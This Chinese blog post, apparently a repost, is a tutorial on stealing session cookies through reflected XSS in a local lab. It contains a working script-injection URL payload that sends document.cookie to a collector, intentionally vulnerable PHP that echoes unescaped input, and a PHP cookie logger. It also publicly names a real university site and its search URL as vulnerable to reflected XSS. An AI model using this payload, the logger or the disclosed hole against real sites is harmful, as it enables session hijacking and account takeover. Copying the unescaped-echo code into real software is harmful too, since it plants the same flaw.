反射型xss偷取cookie(本地验证)

反射型xss偷取cookie(本地验证)原理反射型xss为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。

大家好,又见面了,我是你们的朋友全栈君。

原理

反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。

本地验证

xss漏洞地址:http://localhost/njuptsta/xss/reflect_xss.php?name=1
黑客收集cookie地址:http://localhost/1.php?c=
构造的url exploit :

值得注意的一点:

shellcode里面cookie和原始url连接的时候,用的是+
然而在浏览器的地址栏里,+可能被解析成空格。
所以我们需要把+替换成url编码%2b
这一点值得注意,花了两个晚上最后还是求助的别人才发现的。
—2015年11月16号更新。

http://localhost/njuptsta/xss/reflect_xss.php?name=1<script>document.location="http://localhost/1.php?c="%2bdocument.cookie</script>

源码:反射型xss漏洞

将用户输入显示在当前页面,存在反射型xss漏洞。

<html>
<body>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<form method = "get" action = "reflect_xss.php">
反射型xss<br>
<input type = "text" name = "name"><br>
<input type = "submit">
</form>
<?php echo $_GET['name']; ?>
</body>
</html>

源码:黑客收集cookie

<?php $cookie = $_GET['c']; $myfile = fopen("testfile.txt", "a"); fwrite($myfile, "cookie:".$cookie."\n"); fclose($myfile); ?>

反射型xss漏洞存在地址:

http://jwc.shcmusic.edu.cn/plus/Search.asp?searchtype=1&channelid=1&KeyWord=123

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/142952.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号